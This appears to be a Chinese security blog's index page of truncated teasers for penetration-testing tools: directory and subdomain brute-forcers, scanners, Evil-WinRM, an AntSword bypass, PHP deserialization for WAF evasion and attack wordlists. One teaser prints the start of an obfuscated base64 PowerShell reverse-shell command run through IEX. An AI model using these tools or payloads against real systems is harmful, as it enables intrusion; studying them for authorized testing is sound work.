w13scan介绍w13scan是一款插件化基于流量分析的扫描器，通过编写插件它会从访问流量中自动扫描，基于Python3。w13scan流程图w13scan安装与使用安装gitclone https://github.com/boy-hack/w13scan &cdw13scanpip3install-rrequirements.txtpython3main.py配置Http…

WebPathBrute介绍Windows下确实没有功能比较全又稳定的Web目录扫描暴力探测扫描工具了，此前用过破壳扫描器和dirburte都不稳定经常崩，御剑虽好，但是缺少很多小功能。WebPathBrute WEB目录暴力破解功能先说说并发线程数吧（多线程），虽然默认是20但是加大也无妨看你自己的各个参数设置和机器网络等配置了。超时时间自己视情况而定也不必多介绍了。三、这个随机xff…

蚁剑AntSwordBypassDisableFunctions在昨天，蚁剑AntSword更新了新姿势「BypassDisableFunctions」，提供了另一种攻击思路，我们来过一遍。原理分析基于蚁剑的 FastCGI/PHP-FPM 模式和 AntSword-Labs5 环境。蚁剑在服务器上传了1个so库和一个.antproxy.php，看下.ant…

Subdomain3介绍Subdomain3是新一代子域名爆破工具，它帮助渗透测试者相比与其他工具更快发现更多的信息，这些信息包括子域名，IP，CDN信息等，开始使用它吧!Subdomain3子域名爆破工具截图特性更快三种速度模式.用户也可以修改配置文件(/lib/config.py)来获得更高的速度.CDN识别支持可以判定域名是否使用了CDN.标准C段支持可以对未使用CDN的域名IP进行分类.多…

Konan-Web目录扫描程序Konan是一个开源的用于Web目录扫描的工具，针对目录和文件名。类似的还有DirBuster，dirmap等。下面也对其它类似工具的功能对比。Konan目录扫描支持平台LinuxWindowsMacOSX同类工具功能对比功能Konandirsearchdirbgobuster多线程yesyesyesyes支持多扩展yesyesnonoHTTP代理支持yesyesye…

Evil-WinRMSHELLWinRM是什么?WinRM =WindowsRemoteManagement，即Windows远程管理，以下简称WinRM。Evil-WinRMshell介绍此shell是用于渗透测试的终极WinRMshell。WinRM（Windows远程管理）一种标准的基于SOAP的协议，允许来自不同供应商的硬件和操作系统进行互操作。此程序可以在任何启用此功能的Win…

PHP反序列化介绍在PHP进行反序列化时，会将序列化中的变量传入类中，并且调用__destuct等魔法函数。巧妙应用可达到免杀D盾，过安全狗等WAF软件的效果。TestCode1:输出:xxxxO:1:"A":1:{s:4:"name";s:4:"xxxx";}TestCode2:

BurpSuiteAuthMatrix插件AuthMatrix 是一个BurpSuite扩展，用于检测权限授权问题，设置好session就能进行自动化测试。相似功能的插件还有：BurpSuiteAuthz。Authz会先访问一遍接口抓包，然后“Sendrequest(s)toAuthz”，设置低权限的cookie，“Run”就会使用低权限的cookie去请求，结果会匹配给出相似度百分比，可以查看每…

一个通过TCP加密（AES256位）反弹Shell的工具，使用PowerShell。使用攻击方(C2-Server监听)：PS>.\ReverseTCP.ps1目标(客户端)：ECHOIEX([string]([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String({JABCAGEAcwBlADYANAA9ACIAOABHAEk…

SaiDict渗透测试字典该项目维护者收藏了弱口令，敏感目录，敏感文件等渗透测试常用攻击字典。用于项目的安全审计与安全检测。渗透测试字典项目目前字典的目录大概分布如下：账户字典|-常用弱密码|-常用账户名|-中国人名拼音|-常用手机号fuzz字典|-LDAP注入|-SQL注入|-XSS攻击|-文件遍历|-XXE|-vul(各种中间件目录)中间件弱口令|-axis弱口令|-tomcat账户|-tom…